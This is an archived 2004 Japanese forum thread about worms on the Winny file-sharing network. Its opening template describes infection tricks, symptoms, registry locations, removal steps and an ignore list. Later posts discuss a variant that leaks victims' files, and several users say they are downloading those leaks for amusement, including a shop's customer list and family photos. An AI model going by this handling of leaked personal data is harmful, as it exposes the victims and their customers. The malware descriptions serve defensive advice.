5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

【警報】Winnyを狙ったワーム・ウイルス情報 Part30

1 :[名無し]さん(bin+cue).rar:04/11/06 11:52:39 ID:eX1YLM6y
Winnyで流れているワーム、ウイルス等の報告・調査・対処をするスレです。
質問はテンプレを読んでからにして下さい。
読まずに質問しても「テンプレ嫁」と切り返されるだけです。
余裕があれば過去ログにも目を通してください。
なお、ここは初心者の質問スレではありません。

■流行種
・元祖Antinny系 ・キンタマ系 ・batファイル ・スクリーンセーバー etc

■流行感染パターン
・exeの前にスペースたくさん(例:「秘密の写真.jpg         .exe」等)
・拡張子が.folderに変更されたHTMLからexeを実行させる
・autorunからbatファイルを実行させる
・スタートアップに解凍させ、再起動後exeを実行させる

■DL後のちょっとした注意
・落としたファイルは必ずウイルススキャンする
・exeファイルはうかつに実行しない
・ファイルのアイコンが偽装されてないか確認する

■全ての感染者に共通の、絶対確実な対処方法
ハードディスクをフォーマットした上で、Windowsの再インストールをする。
上書きインストールではダメです。
現在ハードディスクにあるデータは消えるので、待避するなり諦めるなりしてください。

前スレ
【警報】Winnyを狙ったワーム・ウイルス情報 Part29
http://tmp4.2ch.net/test/read.cgi/download/1098962243/l50

テンプレまとめ http://www.geocities.jp/kemkzuenc/Antinny.html
Antinny対策サイト ttp://nyweb.hp.infoseek.co.jp/


2 :[名無し]さん(bin+cue).rar:04/11/06 11:53:08 ID:eX1YLM6y
■質問テンプレ
質問の際、あなたのPC環境やウイルスソフトがわからないと対処できません。
テンプレに沿って答えることで解答が出やすくなります。

【使用OS】
【WindowsUpdateしてるか】
【AntiVirusは】
【ちゃんとUpdateしてるか】
【スキャンした結果】
【オンラインスキャンしたならその結果は】
【Winnyのバージョン】
【Winny歴、総DL量は】
【テンプレを読んだか】
【テンプレにある対策を実行したか】
【症状か具体的に、分かる限りすべて書く】
【何をしたらそんなことになったのか】
【これまでにとった措置】


3 :[名無し]さん(bin+cue).rar:04/11/06 11:53:30 ID:eX1YLM6y
■推奨無視リスト
このままIgnore.txtにコピペしてください。

.exe,,0,0,,0,1,0
.jpg,,0.0085,0.0088,,0,1,0
.jpg .lzh,,0,0,,0,1,0
.g .lzh,,0,0,,0,1,0
.avi .lzh,,0,0,,0,1,0
.m .lzh,,0,0,,0,1,0
.w .lzh,,0,0,,0,1,0
.txt .lzh,,0,0,,0,1,0
.rar .lzh,,0,0,,0,1,0
.cab .lzh,,0,0,,0,1,0
.exe .lzh,,0,0,,0,1,0
※無視リストを追加しすぎるとマシンに負荷が掛かります。


4 :[名無し]さん(bin+cue).rar:04/11/06 11:53:38 ID:h0PcgMWG
3げt

5 :[名無し]さん(bin+cue).rar:04/11/06 11:54:14 ID:eX1YLM6y
■感染しないための注意1 〜やっておくべき設定等〜
・アンチウイルスソフトのインストール及び常駐、定期的な更新。
・シングルクリックをダブルクリックにしてうっかり操作防止。
・ファイルの拡張子は表示させておく。できれば詳細表示を使うか、ファイラを使う。
・nyをProgramFilesに置かない。CacheとDownフォルダは詳細表示にする。
・CD/DVDドライブのAutorun(自動実行)は切っておく。(やり方は以下参照)
・適切な無視リストの設定などで、そもそもウイルスを呼び込まない。(リストは以下参照)
・whiter対策としてC:\Windows\Systemに「Whismng.exe」というフォルダを作成。
 (フォルダ名と同じファイルは置けないのである程度防止になる)
・WhiterVBS簡易チェッカーを使う。
 ttp://mxtrojan.at.infoseek.co.jp/column02.html
・IEのセキュリティ設定を厳しくする。特にActiveXコントロールとプラグインを無効orダイアログ表示に。
 (拡張子.folderで悪意のあるコードを含んだhtmlを読み込むバグ、悪用の危険あり)
 ttp://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
・XMLのOBJECT要素によってコマンドを起動するバグ対策に、
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0にあるFlagsの値を10進数で1に変更する。
・フォルダアイコン、txtアイコンを標準のものから変更しておく。
  (アイコンを偽装したexeを見分けるため。aviやヘルプなど他の拡張子も変更が望ましい)
・レジストリ:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run のアクセス権を制限する。
 ※アプリケーションのインストール時に弊害が起こることもあるので注意。


6 :[名無し]さん(bin+cue).rar:04/11/06 11:54:54 ID:eX1YLM6y
■感染しないための注意2 〜普段からの注意〜
・大事なデータはこまめにバックアップを取る。
・落としたファイルは必ずウイルススキャンする。
・指定外の場所へ解凍される脆弱性がある解凍ソフトがあるので対応済のソフトを使う。
 ttp://www.forest.impress.co.jp/article/2004/07/30/arcsecurity.html
・解凍ソフトはWinRARなど中身を確認できるアーカイバを使う。
・lzh,zip,rarなど圧縮ファイルは解凍後も要注意。
・exeファイルの実行は完全自己責任。
・CDイメージ(CCD等)はautorunを切ってからマウントし、更に実行ファイル(setup.exe等)をウイルススキャンする。
・怪しい・危険なファイルはWinnyFileDatabaseでチェックする。
 ttp://p46.aaacafe.ne.jp/~nydb/

CD/DVDドライブのAutorun(自動実行)の切り方
 ◆Win9x、Meの場合
  1.[マイ コンピュータ]-[プロパティ]-[デバイスマネージャ]-[CD-ROM]-[プロパティ]-[設定]を開く
  2.オプション項目の「挿入の自動通知」のチェックを外す
 ◆Win2000、XPの場合
  1.[スタート]−[ファイル名を指定して実行] から regedit を起動
  2.HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Cdrom を展開
  3.右の「AutoRun」値のデータを0に設定
※設定変更後、必ず再起動すること。再起動しないと有効になりません。
※また窓の手などでソフトでも簡単にオフに出来る。
※DaemonToolsの自動起動とは別です。これをオフにしても自動実行は切れません。

7 :[名無し]さん(bin+cue).rar:04/11/06 11:56:07 ID:eX1YLM6y
★流行種その1
【キンタマ(W32.AntiWinny.K等)】
■感染ルート
・nyあるいはそれ以外の方法でキンタマワームを踏んで感染。
・IEや拡張子「.folder」のバグを利用し、自動実行させ感染。
■症状(感染確認方法)
・Upfolder.txtに登録したことのないフォルダが登録される。
・レジストリエディタ(regedit.exe)を開こうとするとメモ帳が開く。
・"C:\Documents and Settings\ユーザー名\Local Settings\Temp" に"ユーザー名.txt"が作成される。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
 に名前xxx データC:\Program Files\xxx\xxx.exeが登録される。
・スタートアップに該当プログラムが登録される。(msconfigで確認)
・etc.(亜種により様々)
■活動内容(亜種毎に違います)
・Winnyとは関係なくランダムな時間にデスクトップのスクリーンショットを取る。
・デスクトップ上のファイルをまとめて [キンタマ] 俺のデスクトップ PCのユーザー名[日付](ファイル詰め合わせ).lzh という名前でupフォルダに置く。
・UpFolder.txtを書き換えてファイルを勝手にアップロードする。
・Winnyを接続すると知らない間に勝手にこれらをダウンロードする。
・各exeファイルはそのアイコンの本来の動作も同時に行う。
 (例えばjpgアイコンに偽装したexeを起動すると、ワームが実行されると共に画像も表示されるため気づきにくい)
■駆除方法
・Winnyをフォルダごと削除、そしてWinnyを再び入れ直す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runの怪しい値を削除する。
・C:\Program Files\xxx\xxx.exeを削除、 スタートアップからも該当プログラム削除。
■予防
・なるべく関わらない。推奨無視ワード「キンタマ」「デスクトップ」
・今回に関わらず、落とした.exeファイルの実行は控える。
■まとめサイト
ttp://myui.s53.xrea.com/kin/index.html
★関係ウイルス【苺きんたま(Trojan.Upchan)】
ttp://www.geocities.jp/ichigo_kintama/

8 :[名無し]さん(bin+cue).rar:04/11/06 11:56:38 ID:eX1YLM6y
★流行種その2
【Antinny.ms(仮称)】
 Antinny.Bの亜種? サイズ 1.26MB 開発名 SilentToker Delphi製
 ファイルバージョン5.1.3125.1093 製品バージョン6.00.1800.1007
■症状(感染確認方法)
・Windowsフォルダにsvchost.exeを作成。(無い場合もあり)
 (Systemフォルダにあるsvchost.exeは問題ありません)
・UpFolder.txtに名前BBSでダウンフォルダを追加。
・アップ(ダウン?)フォルダのZIP、LZH、RAR(?)に感染。感染の際にアイコンを自ら変更する。
・アンチウイルスソフト(ノートン、バスター)の自動実行を無効にする。
・親と子があり、いずれもSystemフォルダに作成される。子はms???.exe(248k)。親はms???.exe(282k)
 (子を消しても、再起動すると親が子を再度作成する)
・親はサービスに登録される。
・子はHOSTSを書き換えてWindowsUpdateやSymantecなどに接続不可にする。
・親と子はノートンでトロイとして検出される。バスターは未対応?
■活動内容
・毎月第一月曜日に発動。行動内容は不明。
■対策
1. 親のファイル名が含まれるレジストリキーを削除。
  Win2k、XPの場合HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。
  (Win9X、MEの場合は不明)
2. セーフモードで再起動し、親子ともどもファイルを削除。
3. HOSTSファイルを開き、宛先が0.0.0.0の行を全部削除。
  HOSTSファイルは \Windows\System32\Drivers\etc\Hosts をメモ帳などで開く。
4. NyのUpフォルダ設定を元に戻す。
5. ノートンやバスター等のワクチンソフトを再インストール。
  バスターはPCCTool.exeを使えば再インスコせずに済む。


9 :[名無し]さん(bin+cue).rar:04/11/06 11:57:09 ID:eX1YLM6y
★流行種その3
【Autorun+bat】
5種類以上の亜種がある。
■感染ルート
・主にエロゲのイメージファイルをマウントした時やSetupを実行した時に感染。
・Setup.batやSetup.exeを実行させることで感染。
■活動内容(版により活動は異なる)
・deltree、del、rmコマンドでファイル削除。
・bug.exeで気をそらす。
・reg deleteコマンドでレジストリ全削除。
・スタートアップに自身を登録し、再起動毎に活動する。
・レジストリのRunやRunOnceに自身を登録し、再起動毎に活動する。
・システムの復元の無効化。
・Windowsファイル保護の無効化。
・使用者名・企業名変更。
・レジストリエディタ本体及びdllcacheやi386フォルダ内のバックアップの削除。
 (削除したファイルと同名のフォルダを作成する)
・強制再起動
・html(ACCS・JASRACへの田代砲)起動をatコマンドでスケジュールする。
・壁紙のエロCGへの変更(画面のプロパティでの修正は不可)
■駆除方法(版により対処法は異なる)
・batファイルに書かれたDOSコマンドを読んで、加えられた変更を元に戻す。
■対策
・batファイルを不用意に実行しない。
・exeの実行は自己責任で行う。あまりアンチウイルスソフトは役に立たない。


10 :[名無し]さん(bin+cue).rar:04/11/06 11:57:41 ID:eX1YLM6y
★流行種その4
【スクリーンセーバー(仮称)】
・サイズは4,553,632Byte、アイコンはフォルダに偽装。
・感染者が流す圧縮ファイルにある偽装されたウイルス本体から感染の模様。
■症状(感染確認方法)
・ny起動すると画面が真っ黒になり
 赤い文字で「winnyで違法なファイルを集めています」と文字が流れる。
・マウス動かすとログオフ画面に切り替わる。
・起動時にアドレス帳が勝手に立ち上がる。
・タスクマネージャを起動できないようにする。(情報錯綜)
■活動内容
・C:\WINNT\Web\Wallpaperのフォルダが開く。(意味は不明)
・C:\WINDOWS\bugfixというフォルダを作り2つの圧縮ファイル作成。
 [任意ワード][NullPorce] 俺のアドレス帳&お気に入り ユーザー名.zip
 私はユーザー名、Antinnyの作者だ。.zip
・UpFolder.txtに「Path=C:\WINDOWS\bugfix」ができてる。
・Winny.exeが置いてあるフォルダに、"NullPorce2MX.exe" 22,528Byteができる。
・C:\WINNTにWindowsXPのフォルダに偽装したexeファイルを3つ?作る。
・そのexeファイル名はシステムに使用されるものをランダムに使用の模様。
 (報告済み:CTFMON.EXE、Exploder.exe、IMEJPMlG8.0.exeなど、どれも45,056バイト)
・レジストリに以下を追加し、起動時の自動実行が設定される。
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
・また以下も追加、作用は不明?値はGalaxian Explosion
 HKEY_CURRENT_USER\Software\VB and VBA Program Settings\NullPorce2\Attribute
■対策
・C:\WINDOWS\system\にあるwnconfig.txtとアイコンが偽装しているexe削除。
・C:\WINDOWS\bugfix\の中に生成されてる2つのファイルを削除。
・nyを入れてるフォルダにあるUpFolder.txtを削除。
・レジストリで怪しいキー削除。


11 :[名無し]さん(bin+cue).rar:04/11/06 11:58:33 ID:eX1YLM6y
過去スレ
Part1 http://tmp.2ch.net/test/read.cgi/download/1060003283/
Part2 http://tmp.2ch.net/test/read.cgi/download/1060385909/
Part3 http://tmp.2ch.net/test/read.cgi/download/1060700316/
Part4 http://tmp.2ch.net/test/read.cgi/download/1061551896/
Part5 http://tmp.2ch.net/test/read.cgi/download/1063637671/
Part6 http://tmp2.2ch.net/test/read.cgi/download/1066288327/
Part7 http://tmp2.2ch.net/test/read.cgi/download/1068654569/
Part8 http://tmp2.2ch.net/test/read.cgi/download/1072600676/
Part9 http://tmp2.2ch.net/test/read.cgi/download/1075998916/
Part10 http://tmp2.2ch.net/test/read.cgi/download/1078207953/
Part11 http://tmp2.2ch.net/test/read.cgi/download/1079425731/
Part12 http://tmp2.2ch.net/test/read.cgi/download/1079449665/
Part13 http://tmp2.2ch.net/test/read.cgi/download/1079540824/
Part14 http://tmp2.2ch.net/test/read.cgi/download/1079918577/
Part15 http://tmp2.2ch.net/test/read.cgi/download/1080816795/
Part16 http://tmp2.2ch.net/test/read.cgi/download/1081307106/
Part17 http://tmp2.2ch.net/test/read.cgi/download/1082190076/
Part18 http://tmp2.2ch.net/test/read.cgi/download/1083335282/
Part19 http://tmp3.2ch.net/test/read.cgi/download/1084036887/
Part20 http://tmp3.2ch.net/test/read.cgi/download/1084808432/
Part21 http://tmp4.2ch.net/test/read.cgi/download/1086794458/
Part22 http://tmp4.2ch.net/test/read.cgi/download/1089460762/
Part23 http://tmp4.2ch.net/test/read.cgi/download/1091063187/
Part24 http://tmp4.2ch.net/test/read.cgi/download/1092058756/
Part25 http://tmp4.2ch.net/test/read.cgi/download/1093270545/
Part26 http://tmp4.2ch.net/test/read.cgi/download/1094872215/
Part27 http://tmp4.2ch.net/test/read.cgi/download/1095939735/
Part28 http://tmp4.2ch.net/test/read.cgi/download/1096694962/
Part29 http://tmp4.2ch.net/test/read.cgi/download/1098962243/


12 :[名無し]さん(bin+cue).rar:04/11/06 12:02:23 ID:pxHc+A5z
12get

13 :[名無し]さん(bin+cue).rar:04/11/06 12:43:21 ID:mUzfNj1d
ITmedia エンタープライズ:「晒しは一線を越えた」、新種のトロイの木馬Winnyで出回る (1/2)
http://www.itmedia.co.jp/enterprise/articles/0411/05/news089.html


14 :[名無し]さん(bin+cue).rar:04/11/06 12:50:30 ID:eC2DZ6DS
最近 norton2005先生をインスコしたんだが
起動してから操作出来るようになるまで3分くらいかかる様になったんだ。

これってnorton独特の仕様?ちなみにPCスペックは上物。

15 :[名無し]さん(bin+cue).rar:04/11/06 12:54:20 ID:bbdnUn8V
>>14
スレ違いだ。

16 :[名無し]さん(bin+cue).rar:04/11/06 13:12:43 ID:wCWy+jMb
>>14
セキュリティ
http://pc5.2ch.net/sec/
ここら辺で探せ。

17 :[名無し]さん(bin+cue).rar:04/11/06 14:00:03 ID:FQk98yNV
ITmedia→winnyで落としてみる→感染

感染源は前スレの援交みたいなファイルに混ざってた詰め合わせ
[041106-1346][アニメ][DVD][][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip

かりかり言い出してアップフォルダ覘いてみたけど何もなかったけど
winnyのノードリネームして立ち上げてみたらwindows\network\に作られてた。

このファイル以外に何かされてるのかな?

18 :[名無し]さん(bin+cue).rar:04/11/06 14:01:26 ID:FQk98yNV
訂正、system32\network

19 :[名無し]さん(bin+cue).rar:04/11/06 14:03:56 ID:FQk98yNV
ただのいたずらっぽいな。

マイドキュメント                    .scrと
個人情報22.txtみたいな中開くと個人情報ってひたすら書いてあるテキスト群だったし。

20 :[名無し]さん(bin+cue).rar:04/11/06 14:10:33 ID:gHUxZ1pV
system32を覗いてみたけど、これといって…。


21 :[名無し]さん(bin+cue).rar:04/11/06 14:11:20 ID:1icbVGm7
>>19
「マイドキュメント(空白たくさん).scr」の奴は、引っ掛かった奴が必死に
nullpo流して消去させようと無駄なあがきしてるだけでしょ?多分

そんな事より誰か柊のお父さんに教えてあげて下さい。

22 :[名無し]さん(bin+cue).rar:04/11/06 15:29:41 ID:zaITWA8S
スレ立て乙

23 :[名無し]さん(bin+cue).rar:04/11/06 15:36:30 ID:kBdwBbYM
[私には好きな人がいます]
こっちの仙台の詰め合わせ覗いてみた
本人の家族と思われる写真があった 南無

24 :[名無し]さん(bin+cue).rar:04/11/06 15:39:22 ID:kBdwBbYM
柊の意味を理解した
無知って周りにも迷惑掛けるんだな


25 :[名無し]さん(bin+cue).rar:04/11/06 15:40:21 ID:8krR7zZL
仙台を8時間地引したら
10000ファイルたまりやがった
ファイラー固まったよ

26 :[名無し]さん(bin+cue).rar:04/11/06 15:45:34 ID:xhYOM78Q
秋穂さん被参照量が多いようで
でも捏造ぽい

27 :[名無し]さん(bin+cue).rar:04/11/06 16:02:42 ID:1icbVGm7
naoや、りょう程のインパクトある人っている?

今ンとこ福岡の家具屋さんが激ヤバなんですけど・・・。
本人は自業自得だから兎も角として、顧客のプライバシーダダ漏れですわ・・・。

28 :[名無し]さん(bin+cue).rar:04/11/06 16:04:44 ID:d1uAzYSq
Shareなら神鳥の落とせば無問題


プw


29 :[名無し]さん(bin+cue).rar:04/11/06 16:05:48 ID:rZDV6Skc
仙台ギャラクシーエンジェルズ

30 :[名無し]さん(bin+cue).rar:04/11/06 16:06:10 ID:xhYOM78Q
タマツカさんかな

31 :[名無し]さん(bin+cue).rar:04/11/06 16:07:13 ID:r0dNgQpH
昨日からShare、Shareうるさいやつがいるが何がしたいんだ...

32 :[名無し]さん(bin+cue).rar:04/11/06 16:11:37 ID:K7ly2vU/
WindowsXP セットアップ画面のスクリーンショットがあった。

33 :[名無し]さん(bin+cue).rar:04/11/06 16:11:47 ID:1icbVGm7
そういえば、りょう巡査って調書が流出した人から損害賠償裁判起こされて
なかったっけ?あれってどうなったの?示談とか?
今回は自営業者っぽいから訴えられたらあぼ〜ん確定だろうな。福岡だし。

34 :[名無し]さん(bin+cue).rar:04/11/06 16:15:23 ID:z3FiINMV
share信者と創価って似てるよな

しつこいところとか、空気が読めないとことか、人の不幸を喜ぶとことか

35 :[名無し]さん(bin+cue).rar:04/11/06 16:16:41 ID:Yp7TFS36
[私には好きな人がいます]のウィルスの情報求む、症状、本体など。

36 :[名無し]さん(bin+cue).rar:04/11/06 16:36:38 ID:N1Ky1t9f
不安になってプロセス見たんだが
\windows\system32\svchost.exeが6つもあった
その中のSYSTEMの一つがメモリをバカに食ってる 12000〜5000くらい

もしかしてやられましたかね、それとも普通ですか?

37 :[名無し]さん(bin+cue).rar:04/11/06 16:38:18 ID:XSL0MGin
>36
svchostは複数あるのが普通(私は4つ)。
心配なら、ほかの兆候を調べた方が良い。

38 :[名無し]さん(bin+cue).rar:04/11/06 16:39:21 ID:kBdwBbYM
もうね釣りとしか思えない

913 名前:[名無し]さん(bin+cue).rar 投稿日:04/11/06 03:51:41 ID:GK9HDpKJ
【仙台ギャラクシーエンジェル(仮称)】
■感染ルート
・主にエロゲのイメージファイルをマウント、オートランでウイルス発動。
■症状(感染確認方法)
・壁紙を勝手に変更する。
・windows\system32の中にexeを作製(svchost32.exe、setup.exe、ごみ箱.exeなど)
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに上記exe追加。
・レジストリエディタをメモ帳で上書き。
・UpFolder.txtにUPフォルダを追加し、
 Download.txtにウイルスと思われるスペースつきのexeファイルを追加する。
・winnyのフォルダ内に隠しフォルダでUPフォルダが作られ、
 downフォルダ内のファイル一覧のtxt、デスクトップSS、
 Favorites、受信トレイ.dbx、送信トレイ.dbx、My Documentsが入れられる。
・UP時のトリップはユーザー名の模様 。
・Ignore.txtに仙台ギャラクシーエンジェルズを追加するため、自分が晒されてると気づきにくい。
■駆除方法
・windows\system32の中に作製されたexeを削除。
・CDなどから正常なレジストリエディタに戻す。
・HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Runに追加されたキー削除。
・UpFolder.txt、Download.txtの問題箇所修正削除。
■予防
・exeは踏まない。
・オートランを切る。
・エロゲをマウントしない。

前スレ>>913引用

39 :[名無し]さん(bin+cue).rar:04/11/06 16:39:30 ID:j+bxNMss
>>36
それだけじゃわかりません
もっと詳しく書かないとダメデース

40 :[名無し]さん(bin+cue).rar:04/11/06 16:44:53 ID:ewADeyqu
[041105-0352][mp3][三遊亭歌之介][TRICK2 #][私には好きな人がいます][仙台ギャラクシーエンジェルズ][俺のデスクトップ].zip 68,655,418
7c5c92e7a9d0155952030f66b0a175cf

41 :[名無し]さん(bin+cue).rar:04/11/06 16:50:01 ID:8ocINSXh
Shareならトリップ偽装不可、神鳥の落とせば無問題

ププw


42 :[名無し]さん(bin+cue).rar:04/11/06 16:51:50 ID:HjUChkcl
ちょっと試しにダウソしてみた。バスタ2005では検出せず。
フリーのAVGが検出した。

43 :[名無し]さん(bin+cue).rar:04/11/06 16:53:11 ID:rZDV6Skc
バスター、毎回毎回こういうウイルスの対応遅いじゃん

44 :[名無し]さん(bin+cue).rar:04/11/06 17:02:36 ID:r0dNgQpH
>>36
svchostぐぐれ

45 :[名無し]さん(bin+cue).rar:04/11/06 17:07:12 ID:mluK0fxj
>>43
いいよ、こんなウイルス。対応しなくても。どうせあほ犯罪者以外ひっかからない。

46 :[名無し]さん(bin+cue).rar:04/11/06 17:11:51 ID:ReEjECTH
福岡の顧客リストやばくね?
300人分あるよ

本人の出身校まで分かるし。

47 :[名無し]さん(bin+cue).rar:04/11/06 17:12:29 ID:qmVSCD5v
やばいっしょ
ってか、人生終わりではないか?

48 :[名無し]さん(bin+cue).rar:04/11/06 17:15:39 ID:N1Ky1t9f
38参照してみたが仙台には感染していない模様 すまんかったサンクス

最近定期的に重くなるのはコレが原因かと思ったが違かったみたいだ
有名所いくつか試したけど引っかからないし
そろそろスレ違いか ぐぐってくる('A`)ノシ

49 :[名無し]さん(bin+cue).rar:04/11/06 17:17:25 ID:+TyT3fCr
exeダウンロードせず、nyのGetフォルダにあるexeはすぐに削除
CDのautoranオフ
IE使用せずお気に入り登録もなし
OE使用せずメールデータもなし
デスクトップ・マイドキュメント内もスッカラカン


な漏れは観戦したところでなんの実害もない

50 :[名無し]さん(bin+cue).rar:04/11/06 17:17:29 ID:strOlICJ
仙台ひっかかったー。
でも、症状出てないー

51 :[名無し]さん(bin+cue).rar:04/11/06 17:18:50 ID:Xe+Mckix
定義ファイルに登録されてなければ引っ掛かるワケないじゃん

52 :[名無し]さん(bin+cue).rar:04/11/06 17:20:23 ID:Yp7TFS36
>>49
新種はハードディスクにあるファイルから 個人情報がありそうなファイルを全部うp

53 :[名無し]さん(bin+cue).rar:04/11/06 17:22:28 ID:n1esLHhg
仙台で検索しても何も出てこないよ。エロゲクラスタにしないと駄目とか?

54 :[名無し]さん(bin+cue).rar:04/11/06 17:22:49 ID:rZDV6Skc
>>53
仙台ギャラクシーエンジェルズ

55 :[名無し]さん(bin+cue).rar:04/11/06 17:23:00 ID:ReEjECTH
「大事なのことは、自らに責任を持つこと。」

多○○中学校 同窓生代表のお言葉より

PTAやってる40近いオサーンみたいだし、馬鹿息子がny使って流出か?

56 :[名無し]さん(bin+cue).rar:04/11/06 17:28:45 ID:j+bxNMss
>.55
それ以上書くな
お前が逮捕されたいならかまわんがな。


57 :[名無し]さん(bin+cue).rar:04/11/06 17:32:01 ID:+ONPrWGH
本当なら笑えないな、怒りの矛先があらぬ方にいって
以前みたいなエロゲ大弾圧が始まるかもね。

58 :[名無し]さん(bin+cue).rar:04/11/06 17:38:18 ID:MZf0aSDI
この晒しファイルをダウンロードする事は違法なの?

59 :[名無し]さん(bin+cue).rar:04/11/06 17:40:17 ID:vYe4uym9
>>49
上2行と感染したところで実害なしは繋がらないぞ

60 :[名無し]さん(bin+cue).rar:04/11/06 17:52:31 ID:E66uqOJ0
業者から仙台ギャラクシーエンジェル(仮称)の詳細ってまだ出てないの?
itmediaとかじゃなくてセキュリティ専門業者からさ

61 :[名無し]さん(bin+cue).rar:04/11/06 17:52:36 ID:r9wmHfNB
しかしあまり盛り上がらないな…
なんでだろう?(´・ω・`)

62 :[名無し]さん(bin+cue).rar:04/11/06 17:56:47 ID:h5v0k+Js
所詮キンタマの亜種だからだろ、こう言うの嫌だがキンタマの偉大さがよく分かる

63 :[名無し]さん(bin+cue).rar:04/11/06 17:58:19 ID:j+bxNMss
苺キンタマがわかりやすい盛り上がりだった
今Winnyを起動してる人間がすくないから森アガランだろ

64 :[名無し]さん(bin+cue).rar:04/11/06 18:00:13 ID:afcim89U
ITmediaで知って、いまWinnyでギャラ串晒しファイルDL中。
おもしろすぎ!

65 :[名無し]さん(bin+cue).rar:04/11/06 18:01:50 ID:iGlA2j9F
>>53
感染すると仙台ギャラクシーエンジェルズを無視リストに登録するそうですが・・・。

66 :[名無し]さん(bin+cue).rar:04/11/06 18:10:02 ID:n1esLHhg
>>65
いや普段アプリやらないし得ろ動画専門で焙煎とかで繋いでるから。
それでも放置してたら14件ヒットしたよ。
仙台ギャラクシーエンジェルズで繋いでみるよ。うしゃしゃ。

67 :[名無し]さん(bin+cue).rar:04/11/06 18:10:14 ID:gHUxZ1pV
>>65
するどい指摘だw

68 :[名無し]さん(bin+cue).rar:04/11/06 18:12:08 ID:afcim89U
別にクラスタ登録してなくても普通に大量ヒットだったがなぁ。。。

69 :[名無し]さん(bin+cue).rar:04/11/06 18:14:53 ID:NpoA50Gm
仙台ギャラクシーエンジェル面白いね、みんなwinnyでエロゲしか落とさないって
ことが良く分かった。。。

70 :[名無し]さん(bin+cue).rar:04/11/06 18:16:45 ID:afcim89U
こ、ここまで来ちゃったら・・・・俺も引っ込みがつかねぇ・・・・

にワタラ

71 :[名無し]さん(bin+cue).rar:04/11/06 18:20:17 ID:k4BgcvM7
で、グリグリ2は大丈夫なのか?

72 :[名無し]さん(bin+cue).rar:04/11/06 18:22:00 ID:WWu9J9w2
ギャラクシーエンジェルズがCDのオートランで起動するときエロゲのセットアッププログラムも起動するの?

73 :[名無し]さん(bin+cue).rar:04/11/06 18:22:55 ID:afcim89U
ura氏は全然気がついてないみたいだね。でもおもしろいから
全然良いんだけどね。エロゲやりすぎw

74 :[名無し]さん(bin+cue).rar:04/11/06 18:25:38 ID:kLqxVHMy
晒しはほかでやれ

75 :[名無し]さん(bin+cue).rar:04/11/06 18:30:02 ID:kBdwBbYM
色々見たが壁紙が赤くなるのは0時を境が多かった希ガス
あと、詰め合わせは便乗で色々入ってるので注意しる


76 :[名無し]さん(bin+cue).rar:04/11/06 18:30:04 ID:mluK0fxj
晒しはこちらで
http://sakura02.bbspink.com/test/read.cgi/erolive/1096306691/

77 :[名無し]さん(bin+cue).rar:04/11/06 18:30:23 ID:g1mjbDr8
(・∀・)コンニチハ!!

78 :[名無し]さん(bin+cue).rar:04/11/06 18:32:06 ID:segKbo9K
晒しスレどこ?

79 :[名無し]さん(bin+cue).rar:04/11/06 18:33:20 ID:n1esLHhg
>>68
勘弁してくれよ、不安になってくるじゃないか〜

80 :[名無し]さん(bin+cue).rar:04/11/06 18:35:56 ID:afcim89U
なんかキャッシュビューアで見るとわかるらしいよ。
これまた晒し画像で気がついたんだけどw

81 :[名無し]さん(bin+cue).rar:04/11/06 18:43:38 ID:qmVSCD5v
私には好きな人が・・・はエロゲではなく別のが感染元っぽいなあ・・・。

82 :[名無し]さん(bin+cue).rar:04/11/06 18:44:05 ID:6TEaGAyV
仙台GA踏んじまった・・・

83 :[名無し]さん(bin+cue).rar:04/11/06 18:46:21 ID:kLqxVHMy
>>81
晒しはいらんがこういう亜種の亜種情報キボー

84 :[名無し]さん(bin+cue).rar:04/11/06 18:46:53 ID:Xa6fVv56
>>82
アカウント名キボンヌ

85 :[名無し]さん(bin+cue).rar:04/11/06 18:48:27 ID:XzHiiAcs
>>79
うちも出ないと思ったらjpg無視してた。

86 :[名無し]さん(bin+cue).rar:04/11/06 18:53:06 ID:Xo2yCLkU
壁紙が赤くなるかどうかは、ウイルスに感染した時に童貞だったかどうかで決まるってゴーダさんが言ってました。

87 :[名無し]さん(bin+cue).rar:04/11/06 18:59:53 ID:afcim89U
つーか、なんか知り合いいるっぽいから今検証中…
マジならちょっと笑えるな

88 :[名無し]さん(bin+cue).rar:04/11/06 19:00:10 ID:MPcmBec3
>>76踏んだらノートンアンチウイルス2000が反応したんだが


89 :[名無し]さん(bin+cue).rar:04/11/06 19:00:53 ID:n1esLHhg
>>85
jpg虫ってたorz
きんたまみたいにセットで圧縮だと思ってたよ。
香田の世界へ逝ってきます。

90 :[名無し]さん(bin+cue).rar:04/11/06 19:03:01 ID:afcim89U
なんか香田氏と同じ名前を使ってるユーザがいてちょっと不謹慎だと思った。
11-01だから本人では絶対無いけど。

91 :[名無し]さん(bin+cue).rar:04/11/06 19:04:38 ID:r0dNgQpH
晒しとか踏みました報告いいから
何で踏んだからお前ら注意しろよと有意義なの頼む

92 :[名無し]さん(bin+cue).rar:04/11/06 19:04:59 ID:LY17JCrQ
それわざと香田の名前で流してるだけだろ。
他にも芸能人とかあるな。金正日もキンタマの時あったべ。

93 :[名無し]さん(bin+cue).rar:04/11/06 19:06:17 ID:afcim89U
>>91
気づいてない人が大半なんじゃないの?
みんな気づき初めてやっと情報が流れるんだと思う。

94 :[名無し]さん(bin+cue).rar:04/11/06 19:06:27 ID:FthLsy5G
>88
俺も2003にてアンチが反応あり。

どういうことだ?

95 :[名無し]さん(bin+cue).rar:04/11/06 19:06:38 ID:5q3JpcQY
>>92
わざと香田の名前で流してるから不謹慎なんだろうが

96 :[名無し]さん(bin+cue).rar:04/11/06 19:08:01 ID:LY17JCrQ
>>95
>なんか香田氏と同じ名前を使ってるユーザがいてちょっと不謹慎だと思った。
 同 じ 名 前 を 使 っ て る ユ ー ザ が い て

